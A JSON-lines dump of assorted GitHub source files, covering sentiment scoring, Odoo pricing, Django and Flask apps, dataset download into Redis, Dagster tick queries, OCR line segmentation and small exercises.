get_word_polarity(article[i],lang_code, model)\n\t\tdistance = i \n\t\ttot_polarity_start = tot_polarity_start + polarity*(distance/start_point)\n\n\tprint(tot_polarity_start)\n\n\tend_dist = len(article) - 1 \n\tfor i in range(end_point+1, len(article)):\n\t\tif lang_code == 'en':\n\t\t\tpolarity = get_word_polarity_en(article[i])\n\t\tif lang_code == 'hi':\n\t\t\tpolarity = get_word_polarity(article[i], lang_code, model)\n\t\tdistance = end_dist - i\n\t\ttot_polarity_end = tot_polarity_end + (distance/end_dist)*polarity\n\n\tprint(tot_polarity_end)\n\n\ttot_polarity = tot_polarity_start + tot_polarity_end\n\treturn tot_polarity\n\n\t\n# Function is used to find the final polarity of the aspect term in an article\n# Takes the aspect term, sentences and the language code as input\n# pass pos_words and neg_words dictionaty list along with the FastText embeddings model when using Indian languages\n# pass the respective model and word lists for a given language.\n# the aspect term should be tokenized \n# the sentences mean that a whole article should be broken down into sentences using the sentence\n# segmentation \ndef aspect_polarity(aspect_term, sentences, lang_code, model=None):\n if lang_code == 'en':\n sentences = [spacy_tokenizer(i) for i in sentences]\n if lang_code == 'hi':\n sentences = 
[tokenize_hin(i) for i in sentences]\n sentences = [remove_hin_stopwords(i, filepath) for i in sentences]\n print(sentences)\n tot_polarity = 0\n for review in sentences:\n try:\n polarity = word_distance_based_score(aspect_term, review, lang_code, model=model )\n tot_polarity = tot_polarity + polarity\n except ValueError: # for handling sentences which don't have aspect term in the article \n tot_polarity = tot_polarity + 0 \n \n if tot_polarity > 0: \n aspect_polarity = 1\n elif tot_polarity == 0:\n aspect_polarity = 0\n else:\n aspect_polarity = -1 \n\n return aspect_polarity ","repo_name":"AchintyaX/ABSA_Indic","sub_path":"ABSA_Rule_Based.py","file_name":"ABSA_Rule_Based.py","file_ext":"py","file_size_in_byte":3645,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"28550598774","text":"# -*- coding: utf-8 -*-\nfrom openerp import models, fields, exceptions, api, _\nimport openerp.addons.decimal_precision as dp\n\n\nclass PurchaseCostDistribution(models.Model):\n _inherit = \"purchase.cost.distribution\"\n \n cost_lines = fields.One2many(readonly=True, states={'draft': [('readonly', False)], 'calculated': [('readonly', False)]})\n benefit_margin = fields.Float (string = 'Margin %', readonly=True,\n states = {'draft': [('readonly', False)], 'calculated': [('readonly', False)]}, default = -1,\n help = \"If the margin is less than 0, it does not apply\")\n\n @api.multi\n def action_calculate (self):\n super (PurchaseCostDistribution, self).action_calculate ()\n for distribution in self:\n for line in distribution.cost_lines:\n if line.benefit_margin >= 0:\n if self.env.ref('distribution_price_margin.group_margin_calculation_type') in self.env['res.users'].browse([self._uid]).groups_id:\n line.benefit_price = line.standard_price_new / (1 - (line.benefit_margin / 100))\n else:\n line.benefit_price = line.standard_price_new + (line.standard_price_new * (line.benefit_margin / 100))\n else:\n line.benefit_price = 0\n return True\n \n @api.multi\n def set_margin (self):\n for distribution in self:\n for line in distribution.cost_lines:\n line.benefit_margin = distribution.benefit_margin\n \n @api.one\n def action_done(self):\n for line in self.cost_lines:\n if line.benefit_price > 0:\n line.product_id.lst_price = line.benefit_price\n super (PurchaseCostDistribution, self).action_done ()\n \nclass PurchaseCostDistributionLine(models.Model):\n _inherit = \"purchase.cost.distribution.line\"\n \n state = fields.Selection (readonly = True, related = \"distribution.state\")\n benefit_margin = fields.Float (string = 'Margin %', readonly = False, default = -1)\n benefit_price = fields.Float (string = 'Sale Price', help = _(\"If the value is 0 or negative, the sale price is not changed\"))\n old_sale_price = fields.Float (related=\"product_id.lst_price\", readonly = True)\n \n @api.onchange('benefit_price')\n def onchange_benefit_price(self):\n if self.benefit_price >= 0:\n try:\n if self.env.ref('distribution_price_margin.group_margin_calculation_type') in self.env[\n 'res.users'].browse([self._uid]).groups_id:\n self.benefit_margin = (1 - (self.standard_price_new / self.benefit_price)) * 100\n else:\n self.benefit_margin = ((self.benefit_price - self.standard_price_new) / self.standard_price_new) * 100\n except:\n self.benefit_margin = -1\n else:\n self.benefit_margin = -1\n \n @api.onchange('benefit_margin')\n def onchange_benefit_margin(self):\n if self.benefit_margin >= 0:\n try:\n if 
self.env.ref('distribution_price_margin.group_margin_calculation_type') in self.env[\n 'res.users'].browse([self._uid]).groups_id:\n self.benefit_price = self.standard_price_new / (1 - (self.benefit_margin / 100))\n else:\n self.benefit_price = self.standard_price_new + (self.standard_price_new * (self.benefit_margin / 100))\n except:\n self.benefit_price = 0\n else:\n self.benefit_price = 0\n\n","repo_name":"dtorresxp/land_cost12","sub_path":"distribution_price_margin/models/purchase_cost_distribution.py","file_name":"purchase_cost_distribution.py","file_ext":"py","file_size_in_byte":3626,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"40240997205","text":"from sqlalchemy import Column, String\nfrom TelethonHell.DB import BASE, SESSION\n\n\nclass Sudo(BASE):\n __tablename__ = \"sudo\"\n chat_id = Column(String(14), primary_key=True)\n\n def __init__(self, chat_id):\n self.chat_id = chat_id\n\n\nSudo.__table__.create(checkfirst=True)\n\n\ndef in_sudo(chat_id):\n try:\n return SESSION.query(Sudo).filter(Sudo.chat_id == str(chat_id)).one()\n except BaseException:\n return None\n finally:\n SESSION.close()\n\n\ndef add_sudo(chat_id):\n adder = Sudo(str(chat_id))\n SESSION.add(adder)\n SESSION.commit()\n\n\ndef rem_sudo(chat_id):\n rem = SESSION.query(Sudo).get(str(chat_id))\n if rem:\n SESSION.delete(rem)\n SESSION.commit()\n\n\ndef all_sudo():\n rem = SESSION.query(Sudo).all()\n SESSION.close()\n if rem:\n return rem\n else:\n return 1234\n","repo_name":"The-HellBot/Plugins-T","sub_path":"TelethonHell/DB/sudo_sql.py","file_name":"sudo_sql.py","file_ext":"py","file_size_in_byte":851,"program_lang":"python","lang":"en","doc_type":"code","stars":30,"dataset":"github-code","pt":"53"} +{"seq_id":"31317255697","text":"import re\n\nif __name__ == '__main__':\n regex = re.compile(\"^[+-]?\\d*(\\.{1}\\d{1,})$\")\n\n T = int(input())\n for i in range(T):\n s = input()\n if regex.match(s):\n print(True)\n else:\n print(False)","repo_name":"andrewupk/HackerRank","sub_path":"Python/RegexAndParsing/FloatingPoint.py","file_name":"FloatingPoint.py","file_ext":"py","file_size_in_byte":242,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"38688307624","text":"from data.lexer import Lexer\nimport os\n\nos.system('cls')\n\ndef main():\n lexer = Lexer()\n\n with open('data/test.py', 'r', encoding='utf-8') as file:\n data = file.read()\n file.close()\n \n lexer.set_data(data)\n\n token_list = [i for i in lexer.lexerGenerator()]\n\n print(data)\n print(token_list)\n \n\nif __name__ == \"__main__\":\n main()\n","repo_name":"TagCopperLight/OneLine-Compiler","sub_path":"main.py","file_name":"main.py","file_ext":"py","file_size_in_byte":372,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"11278945423","text":"\"\"\"Module contains classes Enemy, Player\"\"\"\n\nfrom random import randint\nfrom settings import PLAYER_LIVES, ALLOWED_ATTACK, PlayerMove\nfrom exception import GameOver, EnemyDown\n\n\n\nclass Enemy:\n \"\"\"Class Enemy\"\"\"\n\n def __init__(self, level):\n \"\"\"Constructor accepts argument: level\"\"\"\n self.level = level\n self.lives = self.level\n\n @staticmethod\n def select_attack():\n \"\"\"Method returns a random number\"\"\"\n return randint(1, 3)\n\n def decrease_lives(self):\n \"\"\"Method changes the number of opponent's lives and raises an exception EnemyDown\"\"\"\n self.lives -= 1\n if self.lives == 0:\n 
raise EnemyDown\n\n\nclass Player:\n    \"\"\"Class Player\"\"\"\n\n    def __init__(self, name):\n        \"\"\"Constructor accepts argument: name\"\"\"\n        self.name = name\n        self.lives = PLAYER_LIVES\n        self.score = 0\n        self.allowed_attacks = ALLOWED_ATTACK\n\n    @staticmethod\n    def fight(attack, defense):\n        \"\"\"Method returns the result of the attack/defense\"\"\"\n        # 1 = rock, 2 = paper, 3 = scissors: rock beats scissors, paper beats rock, scissors beat paper\n        if attack == defense:\n            return 0\n        elif (attack == 1 and defense == 3) or \\\n                (attack == 2 and defense == 1) or \\\n                (attack == 3 and defense == 2):\n            return 1\n        else:\n            return -1\n\n\n    def decrease_lives(self):\n        \"\"\"Method changes the number of opponent's lives and raises an exception GameOver\"\"\"\n        self.lives -= 1\n        if self.lives == 0:\n            raise GameOver(self.name, self.score)\n\n    def attack(self, enemy_obj):\n        \"\"\"Method receives data from the console and calls the method fight\"\"\"\n        attack = int(input('Make a choice to move: Choice 1(rock), 2(paper) or 3(scissors):- '))\n        defence = enemy_obj.select_attack()\n        result = self.fight(attack, defence)\n        if result == 0:\n            print(\"it's Draw\")\n            print(\"__________________________\")\n        elif result == 1:\n            print(\"You attacked successfully!\")\n            print(\"__________________________\")\n            self.score += 1\n            enemy_obj.decrease_lives()\n        elif result == -1:\n            print(\"You missed!\")\n            print(\"__________________________\")\n        print(\"Your score:\", self.score)\n        print(\"Your life:\", self.lives)\n\n    def defence(self, enemy_obj):\n        \"\"\"Method receives data from the console and calls the method fight\"\"\"\n        defence = int(input('Make a choice to move: Choice 1(rock), 2(paper) or 3(scissors):- '))\n        attack = enemy_obj.select_attack()\n        result = self.fight(attack, defence)\n        if result == 0:\n            print(\"it's Draw\")\n            print(\"____________________________\")\n        elif result == 1:\n            print(\"Enemy attacked successfully!\")\n            print(\"____________________________\")\n            self.decrease_lives()\n        elif result == -1:\n            print(\"You missed!!\")\n            print(\"____________________________\")\n\n","repo_name":"Stebeniev/First_game","sub_path":"models.py","file_name":"models.py","file_ext":"py","file_size_in_byte":2981,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"16536238387","text":"from calidadaguas import CSVWriter, NayadeScraping\n\n# Reuse a single scraper so every beach accumulates into scraping.beaches.\nscraping = NayadeScraping.NayadeScraping()\n\n# We don't know the number of beaches, we have to bruteforce it.\nfor i in range(1, 1979):\n    # Get the beach info.\n    scraping.scrap(i)\n\nwriter = CSVWriter.CSVWriter()\nwriter.dump_data(scraping.beaches)\n","repo_name":"openkratio/calidad-aguas","sub_path":"old/calidad-aguas.py","file_name":"calidad-aguas.py","file_ext":"py","file_size_in_byte":298,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"}
{"seq_id":"167843933","text":"import copy\n\n\nclass Solution:\n    def rotate(self, matrix):\n        \"\"\"\n        :type matrix: List[List[int]]\n        :rtype: void Do not return anything, modify matrix in-place instead.\n        \"\"\"\n        temp = copy.deepcopy(matrix[::-1])\n        a = len(matrix)\n        b = len(matrix[0])\n        \n        for i in range(a):\n            for j in range(b):\n                matrix[j][i] = temp[i][j]\n        # matrix = zip(*matrix[::-1])\n        \n        \n        \n","repo_name":"MingfeiPan/leetcode","sub_path":"array/48.py","file_name":"48.py","file_ext":"py","file_size_in_byte":461,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"39818938835","text":"import itertools\n\ntriangle = []\nsquare = []\npentagonal =[]\nhexagonal = []\nheptagonal = []\n
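# collect every 4-digit polygonal number P3..P8; main() below chains them by matching 2-digit suffixes to prefixes\noctagonal = 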
[]\nn = 1\ntri = 0\n\nwhile tri < 10000:\n    \n    tri = int(n*(n+1)/2)\n    if 1000 < tri < 10000:\n        triangle.append(tri)\n    \n    sq = n**2\n    if 1000 < sq < 10000: \n        square.append(sq)\n    \n    pen = int(n*(3*n-1)/2)\n    if 1000 < pen < 10000:\n        pentagonal.append(pen)\n    \n    hexa = int(n*(2*n-1))\n    if 1000 < hexa < 10000:\n        hexagonal.append(hexa)\n    \n    hep = int(n*(5*n-3)/2)\n    if 1000 < hep < 10000:\n        heptagonal.append(hep)\n    \n    octa = int(n*(3*n-2))\n    if 1000 < octa < 10000:\n        octagonal.append(octa)\n    n += 1\n    \norderings = list(itertools.permutations([square, pentagonal, hexagonal, heptagonal, octagonal], 5))\n\ndef main():\n    for i in range(len(orderings)):\n        v,w,x,y,z = orderings[i]\n        \n        for tri in triangle:\n            for sq in v:\n                if str(tri)[2:] == str(sq)[:2]:\n                    for pen in w:\n                        if str(sq)[2:] == str(pen)[:2]:\n                            for hexa in x:\n                                if str(pen)[2:] == str(hexa)[:2]:\n                                    for hep in y:\n                                        if str(hexa)[2:] == str(hep)[:2]:\n                                            for octa in z:\n                                                if str(hep)[2:] == str(octa)[:2] and str(octa)[2:] == str(tri)[:2]:\n                                                    print(tri,sq,pen,hexa,hep,octa)\n                                                    return tri + sq + pen + hexa + hep + octa\n    \nans = main()","repo_name":"jgrou/ProjectEuler","sub_path":"CyclicalFigurateNumbers.py","file_name":"CyclicalFigurateNumbers.py","file_ext":"py","file_size_in_byte":1706,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"19625652166","text":"from rest_framework import viewsets\nfrom rest_framework.decorators import action\nfrom rest_framework.permissions import IsAuthenticated\nfrom rest_framework.response import Response\n\nfrom django_filters import FilterSet, OrderingFilter\n\nfrom users.models import User\nfrom users.serializers import UserSerializer\n\n\nclass UserFilter(FilterSet):\n    order = OrderingFilter(\n        fields=(\n            ('created_at', 'created_at'),\n            ('username', 'username'),\n        ),\n    )\n\n    class Meta:\n        model = User\n        fields = {\n            'username': ('icontains',)\n        }\n\n\nclass UserViewSet(viewsets.ModelViewSet):\n    queryset = User.objects.all()\n    serializer_class = UserSerializer\n    filterset_class = UserFilter\n\n    @action(detail=False, methods=['get'])\n    def self(self, request):\n        data = UserSerializer(request.user).data\n\n        return Response(data)\n\n    def get_permissions(self, *args, **kwargs):\n        permission_classes = {\n            'self': (IsAuthenticated,),\n            'list': (IsAuthenticated,)\n        }.get(self.action, ())\n\n        return [permission() for permission in permission_classes]\n","repo_name":"grmoon/escrow","sub_path":"escrow/users/views.py","file_name":"views.py","file_ext":"py","file_size_in_byte":1150,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"}
{"seq_id":"74428497447","text":"from google.appengine.ext import ndb\nfrom my.models import QueDoidura\nimport json\nfrom google.appengine.api import namespace_manager\n\n\n# Optional. 
Returns how many migrations should be run per task (default = 1000)\nMIGRATIONS_PER_TASK = 2\n\n# Friendly description of this database change\nDESCRIPTION = 'multiplies by 2'\n\n\ndef update_json_data(migrate_result, old_json_data):\n    old_json_data = json.loads(old_json_data) if old_json_data else {}\n    migrate_result = json.loads(migrate_result) if migrate_result else {}\n    if 'v1_for_namespace' not in old_json_data:\n        old_json_data['v1_for_namespace'] = {}\n    for ns in migrate_result['v1_for_namespace']:\n        if ns in old_json_data['v1_for_namespace']:\n            old_json_data['v1_for_namespace'][ns].extend(migrate_result['v1_for_namespace'][ns])\n        else:\n            old_json_data['v1_for_namespace'][ns] = migrate_result['v1_for_namespace'][ns]\n    return json.dumps(old_json_data)\n\n\ndef get_query():\n    \"\"\" Returns a query object for the entities that need to be migrated \"\"\"\n    return QueDoidura.query()\n\n\ndef migrate_many(entities):\n    for entity in entities:\n        entity.v2 = entity.v1 * 2\n    ndb.put_multi(entities)\n    ns = namespace_manager.get_namespace()\n    return json.dumps({'v1_for_namespace': {ns: [e.v1 for e in entities]}})","repo_name":"qmagico/gae-migrations","sub_path":"tests/my/migrations/migration_0001_one.py","file_name":"migration_0001_one.py","file_ext":"py","file_size_in_byte":1317,"program_lang":"python","lang":"en","doc_type":"code","stars":2,"dataset":"github-code","pt":"53"} {"seq_id":"73976354408","text":"from .Circle import Circle\nfrom .Line import Line\nfrom .Point import Point\n\nclass Animator:\n    @staticmethod\n    def construct(line, frame_count):\n        \"\"\"\n        int -> list\n        :returns: returns a list that is the animation of a line being drawn\n        from self.a to self.b\n        \"\"\"\n        res = []\n        # offset_x/y computes the x/y of b at the ith frame wrt a\n        offset_x = lambda i: int((i * line.dx)/(frame_count-1))\n        offset_y = lambda i: int((i * line.dy)/(frame_count-1))\n        # b(i) computes the location of b at the ith frame\n        b = lambda i: (line.a.x + offset_x(i), line.a.y + offset_y(i))\n        a = line.a\n        for i in range(frame_count):\n            b_i = Point(*b(i))\n            next_line = Line(a, b_i)\n            res.append(next_line.node)\n        return res\n","repo_name":"JDong3/euclidean","sub_path":"objects/geometry/Animator.py","file_name":"Animator.py","file_ext":"py","file_size_in_byte":850,"program_lang":"python","lang":"en","doc_type":"code","stars":1,"dataset":"github-code","pt":"53"} {"seq_id":"7214035207","text":"import functools\nimport json\nimport os\nimport pathlib\nimport shutil\nimport tarfile\nfrom pathlib import Path\n\nimport click\nimport pandas as pd\nimport redis\nimport requests\nfrom redis.commands.json.path import Path as redPath\nfrom tqdm import tqdm\nfrom collections import OrderedDict\n\n\ndata_dir = Path('semantic_search/data/abo/')\n\nurl = 'https://amazon-berkeley-objects.s3.amazonaws.com/archives/'\nfilename = 'abo-images-small.tar'\ntar_filename = os.path.join('abo', filename)\npath = pathlib.Path('abo') / filename\nlistings = 'https://amazon-berkeley-objects.s3.amazonaws.com/archives/abo-listings.tar'\npath_list = pathlib.Path('abo') / 'abo-listings.tar'\nlistings_dir = data_dir/ 'listings'/'metadata'\ncsv = data_dir / 'images' /'metadata'/'images.csv.gz'\n\n\nr = redis.Redis(host=\"localhost\", port=6379)\nCONTEXT_SETTINGS = dict(help_option_names=[\"-h\", \"--help\"])\n\nclass OrderedGroup(click.Group):\n    def __init__(self, name=None, commands=None, **attrs):\n        super(OrderedGroup, self).__init__(name, commands, **attrs)\n        #: the registered subcommands by their exported names.\n        self.commands = commands or OrderedDict()
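\n        # Note (illustrative): click's stock Group sorts subcommands\n        # alphabetically in --help output; keeping an ordered mapping here,\n        # together with list_commands below, preserves registration order\n        # instead, so `download` is listed before `extract` and `add`.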
\n\n    def list_commands(self, ctx):\n        return self.commands\n\n\n@click.group(cls=OrderedGroup, context_settings=CONTEXT_SETTINGS)\ndef cli():\n    pass\n\n@cli.command()\ndef download():\n    \"\"\"Downloads the Amazon-Berkeley Objects dataset to 'abo' directory and continues\"\"\"\n    response = requests.get(url+filename, stream=True)\n    if response.status_code != 200:\n        response.raise_for_status() # Will only raise for 4xx codes, so...\n        raise RuntimeError(f\"Request to {url} returned status code {response.status_code}\")\n    file_size = int(response.headers.get('Content-Length', 0))\n\n    path.parent.mkdir(parents=True, exist_ok=True)\n\n    desc = \"(Unknown total file size)\" if file_size == 0 else \"\"\n    response.raw.read = functools.partial(response.raw.read)\n\n    click.echo('-'*10 + \" Downloading Image Data \" + '-'*10)\n    with tqdm.wrapattr(response.raw, \"read\", total=file_size, desc=desc) as r_raw:\n        with path.open(\"wb\") as f:\n            shutil.copyfileobj(r_raw, f)\n\n\n    response2 = requests.get(listings, stream=True)\n    if response2.status_code != 200:\n        response2.raise_for_status()\n        raise RuntimeError(f\"Request to {listings} returned status code {response2.status_code}\")\n    file_size = int(response2.headers.get('Content-Length', 0))\n    response2.raw.read = functools.partial(response2.raw.read)\n\n    click.echo('-'*10 + \" Downloading Listing Data \" + '-'*10)\n    with tqdm.wrapattr(response2.raw, \"read\", total=file_size, desc=desc) as r_list:\n        with path_list.open(\"wb\") as f:\n            shutil.copyfileobj(r_list, f)\n    _extract()\n\n\n@cli.command(name='extract')\ndef extract():\n    \"Untars the ABO dataset from 'abo' directory and continues\"\n    _extract()\n\ndef _extract():\n    click.echo('-'*10 + \" Extracting Data \" + '-'*10)\n    with tarfile.open(name=path) as tar:\n        # Go over each member\n        for member in tqdm(iterable=tar.getmembers(), total=len(tar.getmembers())):\n            # Extract member\n            tar.extract(member=member, path='abo')\n    with tarfile.open(name=path_list) as tar:\n        tar.extractall(path='abo')\n\n    click.echo('-'*10 + \" Data available at abo/ \" + '-'*10)\n    _add()\n\n\n@cli.command()\ndef add():\n    \"\"\"Adds the untarred metadata to redis db. 
Ensure redis is running.\n The image metadata is with `IMG:image_id` key.\n The photo (flat file) name to image_id mapping is with `MAP:name` key\n \"\"\"\n _add()\n\ndef _add():\n listing_jsons = [f for f in listings_dir.iterdir()]\n def extract_values(x):\n if isinstance(x, list) and 'value' in x[0]:\n return [a['value'] for a in x]\n if pd.isna(x):\n return ''\n else:\n return x\n\n\n descriptors = ['item_id', 'item_name', 'model_name', 'brand', 'bullet_point']\n for listing_file in listing_jsons:\n df_list = pd.read_json(listing_file, lines=True)\n pipe = r.pipeline()\n for _, row in df_list.iterrows():\n feature = json.dumps({d: extract_values(row[d]) for d in descriptors})\n if not pd.isna(row['main_image_id']):\n key = \"IMG:\" + row['main_image_id']\n pipe.json().set(key, redPath.root_path(), feature)\n\n try:\n for img in row['other_image_id']:\n key = \"IMG:\" + img\n pipe.json().set(key, redPath.root_path(), feature)\n\n except TypeError:\n # ignore nans\n pass\n print(\"Starting to update redis\")\n pipe.execute()\n\n df = pd.read_csv(csv)\n df['name'] = df['path'].str.extract(r'\\/(.*).jpg')\n pipe = r.pipeline()\n for _, (name, id) in df[['name', 'image_id']].iterrows():\n pipe.set('MAP:'+ str(name), id )\n pipe.execute()\n\n\nif __name__ == \"__main__\":\n cli()","repo_name":"u6yuvi/fsdl_project","sub_path":"semantic_search/data/download_data.py","file_name":"download_data.py","file_ext":"py","file_size_in_byte":4915,"program_lang":"python","lang":"en","doc_type":"code","stars":5,"dataset":"github-code","pt":"53"} +{"seq_id":"9886383427","text":"import warnings\nfrom typing import TYPE_CHECKING, Optional, Sequence\n\nimport pendulum\nfrom dagster._core.scheduler.instigation import (\n InstigatorType,\n TickStatus,\n)\n\nif TYPE_CHECKING:\n from ..schema.util import ResolveInfo\n from .loader import RepositoryScopedBatchLoader\n\n\ndef get_instigation_ticks(\n graphene_info: \"ResolveInfo\",\n instigator_type: InstigatorType,\n instigator_origin_id: str,\n selector_id: str,\n batch_loader: Optional[\"RepositoryScopedBatchLoader\"],\n dayRange: Optional[int],\n dayOffset: Optional[int],\n limit: Optional[int],\n cursor: Optional[str],\n status_strings: Optional[Sequence[str]],\n before: Optional[float],\n after: Optional[float],\n):\n from ..schema.instigation import GrapheneInstigationTick\n\n if before is None:\n if dayOffset:\n before = pendulum.now(\"UTC\").subtract(days=dayOffset).timestamp()\n elif cursor:\n parts = cursor.split(\":\")\n if parts:\n try:\n before = float(parts[-1])\n except (ValueError, IndexError):\n warnings.warn(f\"Invalid cursor for ticks: {cursor}\")\n\n if after is None:\n after = (\n pendulum.now(\"UTC\").subtract(days=dayRange + (dayOffset or 0)).timestamp()\n if dayRange\n else None\n )\n\n statuses = [TickStatus(status) for status in status_strings] if status_strings else None\n\n if batch_loader and limit and not cursor and not before and not after:\n if instigator_type == InstigatorType.SENSOR:\n ticks = batch_loader.get_sensor_ticks(\n instigator_origin_id,\n selector_id,\n limit,\n )\n elif instigator_type == InstigatorType.SCHEDULE:\n ticks = batch_loader.get_schedule_ticks(\n instigator_origin_id,\n selector_id,\n limit,\n )\n else:\n raise Exception(f\"Unexpected instigator type {instigator_type}\")\n\n return [GrapheneInstigationTick(graphene_info, tick) for tick in ticks]\n\n return [\n GrapheneInstigationTick(graphene_info, tick)\n for tick in graphene_info.context.instance.get_ticks(\n instigator_origin_id,\n selector_id,\n 
before=before,\n after=after,\n limit=limit,\n statuses=statuses,\n )\n ]\n","repo_name":"dagster-io/dagster","sub_path":"python_modules/dagster-graphql/dagster_graphql/implementation/fetch_ticks.py","file_name":"fetch_ticks.py","file_ext":"py","file_size_in_byte":2431,"program_lang":"python","lang":"en","doc_type":"code","stars":8986,"dataset":"github-code","pt":"53"} +{"seq_id":"23328396858","text":"import cv2\nimport numpy as np\nfrom PIL import Image\nimport os, sys\npath = \"/home/hashrin/project/final/working/\"\ndirs = sorted(os.listdir( path ))\ndef seg():\n count=1\n for item in dirs:\n if os.path.isfile(path+item):\n image = cv2.imread(path+item)\n f, e = os.path.splitext(path+item)\n #cv2.imshow('orig',image)\n #cv2.waitKey(0)\n im=image.shape\n # print(im[1])\n #grayscale\n gray = cv2.cvtColor(image,cv2.COLOR_BGR2GRAY)\n # if(image.shape[0]>=1000 or image.shape[1] >=1000):\n # cv2.namedWindow('gray',cv2.WINDOW_NORMAL)\n # cv2.resizeWindow('gray',(im[1]//2,im[0]//2))\n # cv2.imshow('gray',gray)\n # cv2.waitKey(0)\n\n #binary_inverse\n ret,thresh = cv2.threshold(gray,127,255,cv2.THRESH_BINARY+cv2.THRESH_OTSU)\n # if(image.shape[0]>=1000 or image.shape[1] >=1000):\n # cv2.namedWindow('otsu',cv2.WINDOW_NORMAL)\n # cv2.resizeWindow('otsu',(im[1]//2,im[0]//2))\n cv2.imshow('otsu',thresh)\n cv2.waitKey(0)\n thresh=255-thresh\n\n # if(image.shape[0]>=1000 or image.shape[1] >=1000):\n # cv2.namedWindow('binary inverse',cv2.WINDOW_NORMAL)\n # cv2.resizeWindow('binary inverse',(im[1]//2,im[0]//2))\n # cv2.imshow('binary inverse',thresh)\n # cv2.waitKey(0)\n # if(image.shape[0]>=1000 or image.shape[1] >=1000):\n # cv2.namedWindow('second',cv2.WINDOW_NORMAL)\n # cv2.resizeWindow('second',(im[1]//2,im[0]//2))\n # cv2.imshow('second',thresh)\n # cv2.waitKey(0)\n\n # #dilation\n # kernel = np.ones((5,im[1]*3//10), np.uint8)\n # img_dilation = cv2.dilate(thresh, kernel, iterations=1)\n # cv2.imshow('dilated',img_dilation)\n # cv2.waitKey(0)\n\n # #erosion\n # kernel = np.ones((5,im[1]*3//10), np.uint8)\n # img_erosion= cv2.erode(img_dilation, kernel, iterations=1)\n\n # cv2.imshow('eroded',img_erosion)\n # cv2.waitKey(0)\n\n #closing\n kernel = np.ones((3,im[1]//8), np.uint8)\n closing=cv2.morphologyEx(thresh,cv2.MORPH_CLOSE,kernel)\n # if(image.shape[0]>=1000 or image.shape[1] >=1000):\n # cv2.namedWindow('closed',cv2.WINDOW_NORMAL)\n # cv2.resizeWindow('closed',(im[1]//2,im[0]//2))\n cv2.imshow('closed',closing)\n cv2.waitKey(0)\n\n #find contours\n im2,ctrs, hier = cv2.findContours(closing.copy(), cv2.RETR_EXTERNAL, cv2.CHAIN_APPROX_SIMPLE)\n\n #sort contours\n sorted_ctrs = sorted(ctrs, key=lambda ctr: cv2.boundingRect(ctr)[1])\n #sorted_ctrs = sorted(ctrs, key=lambda ctr: cv2.minAreaRect(ctr)[1])\n\n\n for i, ctr in enumerate(sorted_ctrs):\n # Get bounding box\n x, y, w, h = cv2.boundingRect(ctr)\n # Getting ROI\n roi = image[y:y+h, x:x+w]\n roi_thresh=thresh[y:y+h,x:x+w]\n mask=np.zeros_like(gray)\n cv2.drawContours(mask,[ctr],0, (255,255,255), -1)\n cv2.imshow('final',mask)\n cv2.waitKey(0)\n roi_mask=mask[y:y+h,x:x+w]\n roi_thresh=cv2.bitwise_and(roi_thresh,roi_mask)\n #roi_thresh=255-roi_thresh\n\n\n # show ROI\n if(roi.shape[1]>im[1]//15):\n # if(image.shape[1]>1000):\n # cv2.namedWindow('segment no:'+str(i),cv2.WINDOW_NORMAL)\n # cv2.resizeWindow('segment no:'+str(i),(x//2,y//2))\n cv2.imshow('segment no:'+str(i),roi_thresh)\n cv2.imwrite(\"/home/hashrin/project/final/working/line/\"+\"00\"+str(count)+\".jpg\",roi_thresh)\n count=count+1\n # cv2.rectangle(image,(x,y),( x + w, y + h 
),(90,0,255),2)\n # cv2.waitKey(0)\n # cv2.imshow('segment no:'+str(i),roi)\n # cv2.imwrite(\"line/\"+str(i)+\".png\",roi)\n # cv2.waitKey(0)\n #cv2.imshow('marked areas',image)\n #cv2.waitKey(0)\nseg()","repo_name":"Hashrin/Handwritten-Malayalam-OCR","sub_path":"Segmentation/line.py","file_name":"line.py","file_ext":"py","file_size_in_byte":4533,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"23237762690","text":"from flask import Flask, render_template, request\nfrom tensorflow import keras\nfrom tensorflow.keras.preprocessing.sequence import pad_sequences\nfrom tensorflow.keras.preprocessing.text import Tokenizer\nimport numpy as np\nimport pickle\n\napp = Flask(__name__)\n\ndef load_model():\n model = keras.models.load_model('app/model.h5')\n return (model)\n\n@app.route('/')\ndef Home():\n return render_template('index.html')\n\n@app.route('/predict', methods=['POST'])\ndef predict():\n maxlen = 100\n text = request.form['Headline']\n tk = Tokenizer()\n with open('app/tokenizer.pickle', 'rb') as handle:\n tk = pickle.load(handle)\n X = tk.texts_to_sequences([text])\n X = pad_sequences(X,maxlen=maxlen,padding='post',value=0)\n model = load_model()\n pred = model.predict(X)\n pred_perc = np.round(float(100 * pred), decimals=2)\n data = \"Prediction:\"\n percent_text = \"{}% sarcasm detected!\".format(pred_perc)\n if np.round(pred) == 1:\n headline_text_results = \"Therefore, the headline is Sarcastic!\"\n else:\n headline_text_results = \"Therefore, the headline is not Sarcastic!\"\n return render_template('index.html',\n headline_text = text,\n prediction_text= data,\n percent_text=percent_text,\n headline_text_results=headline_text_results)\n\nif __name__ == '__main__':\n app.run(debug=True)\n\n","repo_name":"adamhkb/sarcasm-detector-flask","sub_path":"app/app.py","file_name":"app.py","file_ext":"py","file_size_in_byte":1438,"program_lang":"python","lang":"en","doc_type":"code","stars":0,"dataset":"github-code","pt":"53"} +{"seq_id":"39133204027","text":"from django.conf.urls.defaults import *\nfrom django.utils.translation import ugettext as _\nfrom django.contrib import admin\nadmin.autodiscover()\n\nurlpatterns = patterns('',\n\n url(r'^hit/$',\n \t 'hitcount.views.update_hit_count_ajax',\n \t name='hitcount_update_ajax'),\n\n url(r'^stream-updated/$',\n \t 'ajax.views.stream_updated', \n \t 